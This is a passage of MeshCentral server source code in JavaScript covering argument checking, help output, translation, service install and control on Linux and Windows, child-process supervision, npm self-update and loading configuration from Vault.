obj.webViewsPath = obj.path.join(__dirname, 'views');
obj.webPublicPath = obj.path.join(__dirname, 'public');
obj.webEmailsPath = obj.path.join(__dirname, 'emails');
if (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web/views'))) { obj.webViewsOverridePath = obj.path.join(__dirname, '../../meshcentral-web/views'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web/public'))) { obj.webPublicOverridePath = obj.path.join(__dirname, '../../meshcentral-web/public'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web/emails'))) { obj.webEmailsOverridePath = obj.path.join(__dirname, '../../meshcentral-web/emails'); }
} else {
obj.parentpath = __dirname;
obj.datapath = obj.path.join(__dirname, '../meshcentral-data');
obj.filespath = obj.path.join(__dirname, '../meshcentral-files');
obj.backuppath = obj.path.join(__dirname, '../meshcentral-backups');
obj.recordpath = obj.path.join(__dirname, '../meshcentral-recordings');
obj.webViewsPath = obj.path.join(__dirname, 'views');
obj.webPublicPath = obj.path.join(__dirname, 'public');
obj.webEmailsPath = obj.path.join(__dirname, 'emails');
if (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web/views'))) { obj.webViewsOverridePath = obj.path.join(__dirname, '../meshcentral-web/views'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web/public'))) { obj.webPublicOverridePath = obj.path.join(__dirname, '../meshcentral-web/public'); }
if (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web/emails'))) { obj.webEmailsOverridePath = obj.path.join(__dirname, '../meshcentral-web/emails'); }
}
// Look to see if data and/or file path is specified
if (obj.config.settings && (typeof obj.config.settings.datapath == 'string')) { obj.datapath = obj.config.settings.datapath; }
if (obj.config.settings && (typeof obj.config.settings.filespath == 'string')) { obj.filespath = obj.config.settings.filespath; }
// Create data and files folders if needed
try { obj.fs.mkdirSync(obj.datapath); } catch (e) { }
try { obj.fs.mkdirSync(obj.filespath); } catch (e) { }
// Windows Specific Code, setup service and event log
obj.service = null;
obj.servicelog = null;
if (obj.platform == 'win32') {
var nodewindows = require('node-windows');
obj.service = nodewindows.Service;
var eventlogger = nodewindows.EventLogger;
obj.servicelog = new eventlogger('MeshCentral');
}
// Start the Meshcentral server
obj.Start = function () {
var i;
try { require('./pass').hash('test', function () { }, 0); } catch (e) { console.log('Old version of node, must upgrade.'); return; } // TODO: Not sure if this test works or not.
// Check for invalid arguments
var validArguments = ['_', 'notls', 'user', 'port', 'aliasport', 'mpsport', 'mpsaliasport', 'redirport', 'rediraliasport', 'cert', 'mpscert', 'deletedomain', 'deletedefaultdomain', 'showall', 'showusers', 'listuserids', 'showusergroups', 'shownodes', 'showmeshes', 'showevents', 'showsmbios', 'showpower', 'clearpower', 'showiplocations', 'help', 'exactports', 'xinstall', 'xuninstall', 'install', 'uninstall', 'start', 'stop', 'restart', 'debug', 'filespath', 'datapath', 'noagentupdate', 'launch', 'noserverbackup', 'mongodb', 'mongodbcol', 'wanonly', 'lanonly', 'nousers', 'mpspass', 'ciralocalfqdn', 'dbexport', 'dbexportmin', 'dbimport', 'dbmerge', 'dbencryptkey', 'selfupdate', 'tlsoffload', 'userallowedip', 'userblockedip', 'swarmallowedip', 'agentallowedip', 'agentblockedip', 'fastcert', 'swarmport', 'logintoken', 'logintokenkey', 'logintokengen', 'logintokengen', 'mailtokengen', 'admin', 'unadmin', 'sessionkey', 'sessiontime', 'minify', 'minifycore', 'dblistconfigfiles', 'dbshowconfigfile', 'dbpushconfigfiles', 'dbpullconfigfiles', 'dbdeleteconfigfiles', 'vaultpushconfigfiles', 'vaultpullconfigfiles', 'vaultdeleteconfigfiles', 'configkey', 'loadconfigfromdb', 'npmpath', 'memorytracking', 'serverid', 'recordencryptionrecode', 'vault', 'token', 'unsealkey', 'name', 'log', 'dbstats', 'translate', 'createaccount', 'resetaccount', 'pass', 'adminaccount', 'domain', 'email'];
for (var arg in obj.args) { obj.args[arg.toLocaleLowerCase()] = obj.args[arg]; if (validArguments.indexOf(arg.toLocaleLowerCase()) == -1) { console.log('Invalid argument "' + arg + '", use --help.'); return; } }
if (obj.args.mongodb == true) { console.log('Must specify: --mongodb [connectionstring] \r\nSee https://docs.mongodb.com/manual/reference/connection-string/ for MongoDB connection string.'); return; }
for (i in obj.config.settings) { obj.args[i] = obj.config.settings[i]; } // Place all settings into arguments, arguments have already been placed into settings so arguments take precedence.
if ((obj.args.help == true) || (obj.args['?'] == true)) {
console.log('MeshCentral v' + getCurrentVerion() + ', remote computer management web portal.');
console.log('This software is open source under Apache 2.0 licence.');
console.log('Details at: https://www.meshcommander.com/meshcentral2\r\n');
if ((obj.platform == 'win32') || (obj.platform == 'linux')) {
console.log('Run as a background service');
console.log(' --install/uninstall Install MeshCentral as a background service.');
console.log(' --start/stop/restart Control MeshCentral background service.');
console.log('');
console.log('Run standalone, console application');
}
console.log(' --user [username] Always login as [username] if account exists.');
console.log(' --port [number] Web server port number.');
console.log(' --redirport [number] Creates an additional HTTP server to redirect users to the HTTPS server.');
console.log(' --exactports Server must run with correct ports or exit.');
console.log(' --noagentupdate Server will not update mesh agent native binaries.');
console.log(' --listuserids Show a list of a user identifiers in the database.');
console.log(' --createaccount [username] Create a new user account.');
console.log(' --resetaccount [username] Unlock an account, disable 2FA and set a new account password.');
console.log(' --adminaccount [username] Promote account to site administrator.');
console.log(' --cert [name], (country), (org) Create a web server certificate with [name] server name.');
console.log(' country and organization can optionaly be set.');
return;
}
// Perform web site translations into different languages
if (obj.args.translate) {
// Check NodeJS version
const NodeJSVer = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
if (NodeJSVer < 8) { console.log("Translation feature requires Node v8 or above, current version is " + process.version + "."); process.exit(); return; }
// Check if translate.json is in the "meshcentral-data" folder, if so use that and translate default pages.
var translationFile = null, customTranslation = false;
if (require('fs').existsSync(obj.path.join(obj.datapath, 'translate.json'))) { translationFile = obj.path.join(obj.datapath, 'translate.json'); console.log("Using translate.json in meshentral-data."); customTranslation = true; }
if (translationFile == null) { if (require('fs').existsSync(obj.path.join(__dirname, 'translate', 'translate.json'))) { translationFile = obj.path.join(__dirname, 'translate', 'translate.json'); console.log("Using default translate.json."); } }
if (translationFile == null) { console.log("Unable to find translate.json."); process.exit(); return; }
// Perform translation operations
var didSomething = false;
process.chdir(obj.path.join(__dirname, 'translate'));
var translateEngine = require('./translate/translate.js')
if (customTranslation == true) {
// Translate all of the default files using custom translation file
translateEngine.startEx(['', '', 'minifyall']);
translateEngine.startEx(['', '', 'translateall', translationFile]);
translateEngine.startEx(['', '', 'extractall', translationFile]);
didSomething = true;
}
// Check if "meshcentral-web" exists, if so, translate all pages in that folder.
if (obj.webViewsOverridePath != null) {
didSomething = true;
var files = obj.fs.readdirSync(obj.webViewsOverridePath);
for (var i in files) {
var file = obj.path.join(obj.webViewsOverridePath, files[i]);
if (file.endsWith('.handlebars') && !file.endsWith('-min.handlebars')) {
translateEngine.startEx(['', '', 'minify', file]);
}
}
files = obj.fs.readdirSync(obj.webViewsOverridePath);
for (var i in files) {
var file = obj.path.join(obj.webViewsOverridePath, files[i]);
if (file.endsWith('.handlebars') || file.endsWith('-min.handlebars')) {
translateEngine.startEx(['', '', 'translate', '*', translationFile, file, '--subdir:translations']);
}
}
}
/*
if (obj.webPublicOverridePath != null) {
didSomething = true;
var files = obj.fs.readdirSync(obj.webPublicOverridePath);
for (var i in files) {
var file = obj.path.join(obj.webPublicOverridePath, files[i]);
if (file.endsWith('.htm') && !file.endsWith('-min.htm')) {
translateEngine.startEx(['', '', 'translate', '*', translationFile, file, '--subdir:translations']);
}
}
}
*/
if (didSomething == false) { console.log("Nothing to do."); }
process.exit();
return;
}
// Setup the Node+NPM path if possible, this makes it possible to update the server even if NodeJS and NPM are not in default paths.
if (obj.args.npmpath == null) {
try {
var nodepath = process.argv[0];
var npmpath = obj.path.join(obj.path.dirname(process.argv[0]), 'npm');
if (obj.fs.existsSync(nodepath) && obj.fs.existsSync(npmpath)) {
if (nodepath.indexOf(' ') >= 0) { nodepath = '"' + nodepath + '"'; }
if (npmpath.indexOf(' ') >= 0) { npmpath = '"' + npmpath + '"'; }
if (obj.platform == 'win32') { obj.args.npmpath = npmpath; } else { obj.args.npmpath = (nodepath + ' ' + npmpath); }
}
} catch (ex) { }
}
// Linux background service systemd handling
if (obj.platform == 'linux') {
if (obj.args.install == true) {
// Install MeshCentral in Systemd
console.log('Installing MeshCentral as background Service...');
var userinfo = require('os').userInfo(), systemdConf = null;
if (require('fs').existsSync('/etc/systemd/system')) { systemdConf = '/etc/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/lib/systemd/system')) { systemdConf = '/lib/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/usr/lib/systemd/system')) { systemdConf = '/usr/lib/systemd/system/meshcentral.service'; }
else { console.log('Unable to find systemd configuration folder.'); process.exit(); return; }
console.log('Writing config file...');
require('child_process').exec('which node', {}, function (error, stdout, stderr) {
if ((error != null) || (stdout.indexOf('\n') == -1)) { console.log('ERROR: Unable to get node location: ' + error); process.exit(); return; }
var nodePath = stdout.substring(0, stdout.indexOf('\n'));
var config = '[Unit]\nDescription=MeshCentral Server\n\n[Service]\nType=simple\nLimitNOFILE=1000000\nExecStart=' + nodePath + ' ' + __dirname + '/meshcentral\nWorkingDirectory=' + userinfo.homedir + '\nEnvironment=NODE_ENV=production\nUser=' + userinfo.username + '\nGroup=' + userinfo.username + '\nRestart=always\n# Restart service after 10 seconds if node service crashes\nRestartSec=10\n# Set port permissions capability\nAmbientCapabilities=cap_net_bind_service\n\n[Install]\nWantedBy=multi-user.target\n';
require('child_process').exec('echo \"' + config + '\" | sudo tee ' + systemdConf, {}, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to write config file: ' + error); process.exit(); return; }
console.log('Enabling service...');
require('child_process').exec('sudo systemctl enable meshcentral.service', {}, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to enable MeshCentral as a service: ' + error); process.exit(); return; }
if (stdout.length > 0) { console.log(stdout); }
console.log('Starting service...');
require('child_process').exec('sudo systemctl start meshcentral.service', {}, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to start MeshCentral as a service: ' + error); process.exit(); return; }
if (stdout.length > 0) { console.log(stdout); }
console.log('Done.');
});
});
});
});
return;
} else if (obj.args.uninstall == true) {
// Uninstall MeshCentral in Systemd
console.log('Uninstalling MeshCentral background service...');
var systemdConf = null;
if (require('fs').existsSync('/etc/systemd/system')) { systemdConf = '/etc/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/lib/systemd/system')) { systemdConf = '/lib/systemd/system/meshcentral.service'; }
else if (require('fs').existsSync('/usr/lib/systemd/system')) { systemdConf = '/usr/lib/systemd/system/meshcentral.service'; }
else { console.log('Unable to find systemd configuration folder.'); process.exit(); return; }
console.log('Stopping service...');
require('child_process').exec('sudo systemctl stop meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to stop MeshCentral as a service: ' + err); }
if (stdout.length > 0) { console.log(stdout); }
console.log('Disabling service...');
require('child_process').exec('sudo systemctl disable meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to disable MeshCentral as a service: ' + err); }
if (stdout.length > 0) { console.log(stdout); }
console.log('Removing config file...');
require('child_process').exec('sudo rm ' + systemdConf, {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to delete MeshCentral config file: ' + err); }
console.log('Done.');
});
});
});
return;
} else if (obj.args.start == true) {
// Start MeshCentral in Systemd
require('child_process').exec('sudo systemctl start meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to start MeshCentral: ' + err); process.exit(); return; }
console.log('Done.');
});
return;
} else if (obj.args.stop == true) {
// Stop MeshCentral in Systemd
require('child_process').exec('sudo systemctl stop meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to stop MeshCentral: ' + err); process.exit(); return; }
console.log('Done.');
});
return;
} else if (obj.args.restart == true) {
// Restart MeshCentral in Systemd
require('child_process').exec('sudo systemctl restart meshcentral.service', {}, function (err, stdout, stderr) {
if ((err != null) && (err != '')) { console.log('ERROR: Unable to restart MeshCentral: ' + err); process.exit(); return; }
console.log('Done.');
});
return;
}
}
// Windows background service handling
if ((obj.platform == 'win32') && (obj.service != null)) {
// Check if we need to install, start, stop, remove ourself as a background service
if (((obj.args.xinstall == true) || (obj.args.xuninstall == true) || (obj.args.start == true) || (obj.args.stop == true) || (obj.args.restart == true))) {
var env = [], xenv = ['user', 'port', 'aliasport', 'mpsport', 'mpsaliasport', 'redirport', 'exactport', 'rediraliasport', 'debug'];
for (i in xenv) { if (obj.args[xenv[i]] != null) { env.push({ name: 'mesh' + xenv[i], value: obj.args[xenv[i]] }); } } // Set some args as service environement variables.
var svc = new obj.service({ name: 'MeshCentral', description: 'MeshCentral Remote Management Server', script: obj.path.join(__dirname, 'winservice.js'), env: env, wait: 2, grow: 0.5 });
svc.on('install', function () { console.log('MeshCentral service installed.'); svc.start(); });
svc.on('uninstall', function () { console.log('MeshCentral service uninstalled.'); process.exit(); });
svc.on('start', function () { console.log('MeshCentral service started.'); process.exit(); });
svc.on('stop', function () { console.log('MeshCentral service stopped.'); if (obj.args.stop) { process.exit(); } if (obj.args.restart) { console.log('Holding 5 seconds...'); setTimeout(function () { svc.start(); }, 5000); } });
svc.on('alreadyinstalled', function () { console.log('MeshCentral service already installed.'); process.exit(); });
svc.on('invalidinstallation', function () { console.log('Invalid MeshCentral service installation.'); process.exit(); });
if (obj.args.xinstall == true) { try { svc.install(); } catch (e) { logException(e); } }
if (obj.args.stop == true || obj.args.restart == true) { try { svc.stop(); } catch (e) { logException(e); } }
if (obj.args.start == true || obj.args.restart == true) { try { svc.start(); } catch (e) { logException(e); } }
if (obj.args.xuninstall == true) { try { svc.uninstall(); } catch (e) { logException(e); } }
return;
}
// Windows service install using the external winservice.js
if (obj.args.install == true) {
console.log('Installing MeshCentral as Windows Service...');
if (obj.fs.existsSync(obj.path.join(__dirname, '../WinService')) == false) { try { obj.fs.mkdirSync(obj.path.join(__dirname, '../WinService')); } catch (ex) { console.log('ERROR: Unable to create WinService folder: ' + ex); process.exit(); return; } }
try { obj.fs.createReadStream(obj.path.join(__dirname, 'winservice.js')).pipe(obj.fs.createWriteStream(obj.path.join(__dirname, '../WinService/winservice.js'))); } catch (ex) { console.log('ERROR: Unable to copy winservice.js: ' + ex); process.exit(); return; }
require('child_process').exec('node winservice.js --install', { maxBuffer: 512000, timeout: 120000, cwd: obj.path.join(__dirname, '../WinService') }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to install MeshCentral as a service: ' + error); process.exit(); return; }
console.log(stdout);
});
return;
} else if (obj.args.uninstall == true) {
console.log('Uninstalling MeshCentral Windows Service...');
if (obj.fs.existsSync(obj.path.join(__dirname, '../WinService')) == true) {
require('child_process').exec('node winservice.js --uninstall', { maxBuffer: 512000, timeout: 120000, cwd: obj.path.join(__dirname, '../WinService') }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to uninstall MeshCentral service: ' + error); process.exit(); return; }
console.log(stdout);
try { obj.fs.unlinkSync(obj.path.join(__dirname, '../WinService/winservice.js')); } catch (ex) { }
try { obj.fs.rmdirSync(obj.path.join(__dirname, '../WinService')); } catch (ex) { }
});
} else {
require('child_process').exec('node winservice.js --uninstall', { maxBuffer: 512000, timeout: 120000, cwd: __dirname }, function (error, stdout, stderr) {
if ((error != null) && (error != '')) { console.log('ERROR: Unable to uninstall MeshCentral service: ' + error); process.exit(); return; }
console.log(stdout);
});
}
return;
}
}
// If "--launch" is in the arguments, launch now
if (obj.args.launch) {
if (obj.args.vault) { obj.StartVault(); } else { obj.StartEx(); }
} else {
// if "--launch" is not specified, launch the server as a child process.
var startArgs = [];
for (i in process.argv) {
if (i > 0) {
var arg = process.argv[i];
if ((arg.length > 0) && ((arg.indexOf(' ') >= 0) || (arg.indexOf('&') >= 0))) { startArgs.push(arg); } else { startArgs.push(arg); }
}
}
startArgs.push('--launch', process.pid);
obj.launchChildServer(startArgs);
}
};
// Launch MeshCentral as a child server and monitor it.
obj.launchChildServer = function (startArgs) {
var child_process = require('child_process');
childProcess = child_process.execFile(process.argv[0], startArgs, { maxBuffer: Infinity, cwd: obj.parentpath }, function (error, stdout, stderr) {
if (childProcess.xrestart == 1) {
setTimeout(function () { obj.launchChildServer(startArgs); }, 500); // This is an expected restart.
} else if (childProcess.xrestart == 2) {
console.log('Expected exit...');
process.exit(); // User CTRL-C exit.
} else if (childProcess.xrestart == 3) {
// Server self-update exit
var version = '';
if (typeof obj.args.selfupdate == 'string') { version = '@' + obj.args.selfupdate; }
else if (typeof obj.args.specificupdate == 'string') { version = '@' + obj.args.specificupdate; delete obj.args.specificupdate; }
var child_process = require('child_process');
var npmpath = ((typeof obj.args.npmpath == 'string') ? obj.args.npmpath : 'npm');
var npmproxy = ((typeof obj.args.npmproxy == 'string') ? (' --proxy ' + obj.args.npmproxy) : '');
var env = Object.assign({}, process.env); // Shallow clone
if (typeof obj.args.npmproxy == 'string') { env['HTTP_PROXY'] = env['HTTPS_PROXY'] = env['http_proxy'] = env['https_proxy'] = obj.args.npmproxy; }
var xxprocess = child_process.exec(npmpath + ' install meshcentral' + version + npmproxy, { maxBuffer: Infinity, cwd: obj.parentpath, env: env }, function (error, stdout, stderr) { });
xxprocess.data = '';
xxprocess.stdout.on('data', function (data) { xxprocess.data += data; });
xxprocess.stderr.on('data', function (data) { xxprocess.data += data; });
xxprocess.on('close', function (code) { console.log('Update completed...'); setTimeout(function () { obj.launchChildServer(startArgs); }, 1000); });
} else {
if (error != null) {
// This is an un-expected restart
console.log(error);
console.log('ERROR: MeshCentral failed with critical error, check MeshErrors.txt. Restarting in 5 seconds...');
setTimeout(function () { obj.launchChildServer(startArgs); }, 5000);
}
}
});
childProcess.stdout.on('data', function (data) {
if (data[data.length - 1] == '\n') { data = data.substring(0, data.length - 1); }
if (data.indexOf('Updating settings folder...') >= 0) { childProcess.xrestart = 1; }
else if (data.indexOf('Updating server certificates...') >= 0) { childProcess.xrestart = 1; }
else if (data.indexOf('Server Ctrl-C exit...') >= 0) { childProcess.xrestart = 2; }
else if (data.indexOf('Starting self upgrade...') >= 0) { childProcess.xrestart = 3; }
else if (data.indexOf('Server restart...') >= 0) { childProcess.xrestart = 1; }
else if (data.indexOf('Starting self upgrade to: ') >= 0) { obj.args.specificupdate = data.substring(26).split('\r')[0].split('\n')[0]; childProcess.xrestart = 3; }
var datastr = data;
while (datastr.endsWith('\r') || datastr.endsWith('\n')) { datastr = datastr.substring(0, datastr.length - 1); }
console.log(datastr);
});
childProcess.stderr.on('data', function (data) {
var datastr = data;
while (datastr.endsWith('\r') || datastr.endsWith('\n')) { datastr = datastr.substring(0, datastr.length - 1); }
console.log('ERR: ' + datastr);
if (data.startsWith('le.challenges[tls-sni-01].loopback')) { return; } // Ignore this error output from GreenLock
if (data[data.length - 1] == '\n') { data = data.substring(0, data.length - 1); }
try {
var errlogpath = null;
if (typeof obj.args.mesherrorlogpath == 'string') { errlogpath = obj.path.join(obj.args.mesherrorlogpath, 'mesherrors.txt'); } else { errlogpath = obj.getConfigFilePath('mesherrors.txt'); }
obj.fs.appendFileSync(obj.getConfigFilePath('mesherrors.txt'), '-------- ' + new Date().toLocaleString() + ' ---- ' + getCurrentVerion() + ' --------\r\n\r\n' + data + '\r\n\r\n\r\n');
} catch (ex) { console.log('ERROR: Unable to write to mesherrors.txt.'); }
});
childProcess.on('close', function (code) { if ((code != 0) && (code != 123)) { /* console.log("Exited with code " + code); */ } });
};
// Get current and latest MeshCentral server versions using NPM
obj.getLatestServerVersion = function (callback) {
if (callback == null) return;
try {
if (typeof obj.args.selfupdate == 'string') { callback(getCurrentVerion(), obj.args.selfupdate); return; } // If we are targetting a specific version, return that one as current.
var child_process = require('child_process');
var npmpath = ((typeof obj.args.npmpath == 'string') ? obj.args.npmpath : 'npm');
var npmproxy = ((typeof obj.args.npmproxy == 'string') ? (' --proxy ' + obj.args.npmproxy) : '');
var env = Object.assign({}, process.env); // Shallow clone
if (typeof obj.args.npmproxy == 'string') { env['HTTP_PROXY'] = env['HTTPS_PROXY'] = env['http_proxy'] = env['https_proxy'] = obj.args.npmproxy; }
var xxprocess = child_process.exec(npmpath + npmproxy + ' view meshcentral dist-tags.latest', { maxBuffer: 512000, cwd: obj.parentpath, env: env }, function (error, stdout, stderr) { });
xxprocess.data = '';
xxprocess.stdout.on('data', function (data) { xxprocess.data += data; });
xxprocess.stderr.on('data', function (data) { });
xxprocess.on('close', function (code) {
var latestVer = null;
if (code == 0) { try { latestVer = xxprocess.data.split(' ').join('').split('\r').join('').split('\n').join(''); } catch (e) { } }
callback(getCurrentVerion(), latestVer);
});
} catch (ex) { callback(getCurrentVerion(), null, ex); } // If the system is running out of memory, an exception here can easily happen.
};
// Get current version and all MeshCentral server tags using NPM
obj.getServerTags = function (callback) {
if (callback == null) return;
try {
if (typeof obj.args.selfupdate == 'string') { callback({ current: getCurrentVerion(), latest: obj.args.selfupdate }); return; } // If we are targetting a specific version, return that one as current.
var child_process = require('child_process');
var npmpath = ((typeof obj.args.npmpath == 'string') ? obj.args.npmpath : 'npm');
var npmproxy = ((typeof obj.args.npmproxy == 'string') ? (' --proxy ' + obj.args.npmproxy) : '');
var env = Object.assign({}, process.env); // Shallow clone
if (typeof obj.args.npmproxy == 'string') { env['HTTP_PROXY'] = env['HTTPS_PROXY'] = env['http_proxy'] = env['https_proxy'] = obj.args.npmproxy; }
var xxprocess = child_process.exec(npmpath + npmproxy + ' dist-tag ls meshcentral', { maxBuffer: 512000, cwd: obj.parentpath, env: env }, function (error, stdout, stderr) { });
xxprocess.data = '';
xxprocess.stdout.on('data', function (data) { xxprocess.data += data; });
xxprocess.stderr.on('data', function (data) { });
xxprocess.on('close', function (code) {
var tags = { current: getCurrentVerion() };
if (code == 0) {
try {
var lines = xxprocess.data.split('\r\n').join('\n').split('\n');
for (var i in lines) { var s = lines[i].split(': '); if ((s.length == 2) && (obj.args.npmtag == null) || (obj.args.npmtag == s[0])) { tags[s[0]] = s[1]; } }
} catch (e) { }
}
callback(tags);
});
} catch (ex) { callback({ current: getCurrentVerion() }, ex); } // If the system is running out of memory, an exception here can easily happen.
};
// Initiate server self-update
obj.performServerUpdate = function (version) {
if (obj.serverSelfWriteAllowed != true) return false;
if ((version == null) || (version == '') || (typeof version != 'string')) { console.log('Starting self upgrade...'); } else { console.log('Starting self upgrade to: ' + version); }
process.exit(200);
return true;
};
// Initiate server self-update
obj.performServerCertUpdate = function () { console.log('Updating server certificates...'); process.exit(200); };
// Start by loading configuration from Vault
obj.StartVault = function () {
// Check that the configuration can only be loaded from one place
if ((obj.args.vault != null) && (obj.args.loadconfigfromdb != null)) { console.log("Can't load configuration from both database and Vault."); process.exit(); return; }
// Fix arguments if needed
if (typeof obj.args.vault == 'string') {
obj.args.vault = { endpoint: obj.args.vault };
if (typeof obj.args.token == 'string') { obj.args.vault.token = obj.args.token; }
if (typeof obj.args.unsealkey == 'string') { obj.args.vault.unsealkey = obj.args.unsealkey; }
if (typeof obj.args.name == 'string') { obj.args.vault.name = obj.args.name; }
}
// Load configuration for HashiCorp's Vault if needed
if (obj.args.vault) {
if (obj.args.vault.endpoint == null) { console.log('Missing Vault endpoint.'); process.exit(); return; }
if (obj.args.vault.token == null) { console.log('Missing Vault token.'); process.exit(); return; }
if (obj.args.vault.unsealkey == null) { console.log('Missing Vault unsealkey.'); process.exit(); return; }
if (obj.args.vault.name == null) { obj.args.vault.name = 'meshcentral'; }
// Get new instance of the client
var vault = require("node-vault")({ endpoint: obj.args.vault.endpoint, token: obj.args.vault.token });
vault.unseal({ key: obj.args.vault.unsealkey })
.then(() => {
if (obj.args.vaultdeleteconfigfiles) {
vault.delete('secret/data/' + obj.args.vault.name)
.then(function (r) { console.log('Done.'); process.exit(); })
.catch(function (x) { console.log(x); process.exit(); });
} else if (obj.args.vaultpushconfigfiles) {
// Push configuration files into Vault
if ((obj.args.vaultpushconfigfiles == '*') || (obj.args.vaultpushconfigfiles === true)) { obj.args.vaultpushconfigfiles = obj.datapath; }
obj.fs.readdir(obj.args.vaultpushconfigfiles, function (err, files) {
if (err != null) { console.log('ERROR: Unable to read from folder ' + obj.args.vaultpushconfigfiles); process.exit(); return; }
var configFound = false;
for (var i in files) { if (files[i] == 'config.json') { configFound = true; } }
if (configFound == false) { console.log('ERROR: No config.json in folder ' + obj.args.vaultpushconfigfiles); process.exit(); return; }
var configFiles = {};
for (var i in files) {
const file = files[i];
if ((file == 'config.json') || file.endsWith('.key') || file.endsWith('.crt') || (file == 'terms.txt') || file.endsWith('.jpg') || file.endsWith('.png')) {
const path = obj.path.join(obj.args.vaultpushconfigfiles, files[i]), binary = Buffer.from(obj.fs.readFileSync(path, { encoding: 'binary' }), 'binary');
console.log('Pushing ' + file + ', ' + binary.length + ' bytes.');
if (file.endsWith('.json') || file.endsWith('.key') || file.endsWith('.crt')) { configFiles[file] = binary.toString(); } else { configFiles[file] = binary.toString('base64'); }
}
}
vault.write('secret/data/' + obj.args.vault.name, { "data": configFiles })
.then(function (r) { console.log('Done.'); process.exit(); })
.catch(function (x) { console.log(x); process.exit(); });
});
} else {
// Read configuration files from Vault
vault.read('secret/data/' + obj.args.vault.name)
.then(function (r) {
if ((r == null) || (r.data == null) || (r.data.data == null)) { console.log('Unable to read configuration from Vault.'); process.exit(); return; }
var configFiles = obj.configurationFiles = r.data.data;
// Decode Base64 when needed
for (var file in configFiles) { if (!file.endsWith('.json') && !file.endsWith('.key') && !file.endsWith('.crt')) { configFiles[file] = Buffer.from(configFiles[file], 'base64'); } }
// Save all of the files
if (obj.args.vaultpullconfigfiles) {
for (var i in configFiles) {
var fullFileName = obj.path.join(obj.args.vaultpullconfigfiles, i);
try { obj.fs.writeFileSync(fullFileName, configFiles[i]); } catch (ex) { console.log('Unable to write to ' + fullFileName); process.exit(); return; }
console.log('Pulling ' + i + ', ' + configFiles[i].length + ' bytes.');
}
console.log('Done.');
process.exit();
}
// Parse the new configuration file
var config2 = null;
try { config2 = JSON.parse(configFiles['config.json']); } catch (ex) { console.log('Error, unable to parse config.json from Vault.'); process.exit(); return; }
// Set the command line arguments to the config file if they are not present
if (!config2.settings) { config2.settings = {}; }
for (var i in args) { config2.settings[i] = args[i]; }
obj.args = args = config2.settings;
// Lower case all keys in the config file
try {
require('./common.js').objKeysToLower(config2, ['ldapoptions', 'defaultuserwebstate', 'forceduserwebstate']);
} catch (ex) {
console.log('CRITICAL ERROR: Unable to access the file \"./common.js\".\r\nCheck folder & file permissions.');
process.exit();
return;
}
// Grad some of the values from the original config.json file if present.
if ((config.settings.vault != null) && (config2.settings != null)) { config2.settings.vault = config.settings.vault; }
// We got a new config.json from the database, let's use it.
config = obj.config = config2;
obj.StartEx();
})
.catch(function (x) { console.log(x); process.exit(); });
}
}).catch(function (x) { console.log(x); process.exit(); });
return;
}
}
// Look for easy command line instructions and do them here.
obj.StartEx = function () {
var i;
//var wincmd = require('node-windows');
//wincmd.list(function (svc) { console.log(svc); }, true);
// Setup syslog support
if ((require('os').platform() != 'win32') && ((config.settings.syslog != null) || (config.settings.syslogjson != null) || (config.settings.syslogauth != null))) {
if (config.settings.syslog === true) { config.settings.syslog = 'meshcentral'; }
if (config.settings.syslogjson === true) { config.settings.syslogjson = 'meshcentral-json'; }
if (config.settings.syslogauth === true) { config.settings.syslogauth = 'meshcentral-auth'; }
if (typeof config.settings.syslog == 'string') {
obj.syslog = require('modern-syslog');
console.log('Starting ' + config.settings.syslog + ' syslog.');
obj.syslog.init(config.settings.syslog, obj.syslog.LOG_PID | obj.syslog.LOG_ODELAY, obj.syslog.LOG_LOCAL0);
obj.syslog.log(obj.syslog.LOG_INFO, "MeshCentral v" + getCurrentVerion() + " Server Start");
}
if (typeof config.settings.syslogjson == 'string') {
obj.syslogjson = require('modern-syslog');
console.log('Starting ' + config.settings.syslogjson + ' JSON syslog.');
obj.syslogjson.init(config.settings.syslogjson, obj.syslogjson.LOG_PID | obj.syslogjson.LOG_ODELAY, obj.syslogjson.LOG_LOCAL0);
obj.syslogjson.log(obj.syslogjson.LOG_INFO, "MeshCentral v" + getCurrentVerion() + " Server Start");
}
if (typeof config.settings.syslogauth == 'string') {
obj.authlog = true;
obj.syslogauth = require('modern-syslog');
console.log('Starting ' + config.settings.syslogauth + ' auth syslog.');
obj.syslogauth.init(config.settings.syslogauth, obj.syslogauth.LOG_PID | obj.syslogauth.LOG_ODELAY, obj.syslogauth.LOG_LOCAL0);
obj.syslogauth.log(obj.syslogauth.LOG_INFO, "MeshCentral v" + getCurrentVerion() + " Server Start");
}
}
        // Check top level configuration for any unrecognized values
if (config) { for (var i in config) { if ((typeof i == 'string') && (i.length > 0) && (i[0] != '_') && (['settings', 'domains', 'configfiles', 'smtp', 'letsencrypt', 'peers'].indexOf(i) == -1)) { addServerWarning('Unrecognized configuration option \"' + i + '\".'); } } }
if (typeof obj.args.userallowedip == 'string') { if (obj.args.userallowedip == '') { config.settings.userallowedip = obj.args.userallowedip = null; } else { config.settings.userallowedip = obj.args.userallowedip = obj.args.userallowedip.split(','); } }
if (typeof obj.args.userblockedip == 'string') { if (obj.args.userblockedip == '') { config.settings.userblockedip = obj.args.userblockedip = null; } else { config.settings.userblockedip = obj.args.userblockedip = obj.args.userblockedip.split(','); } }
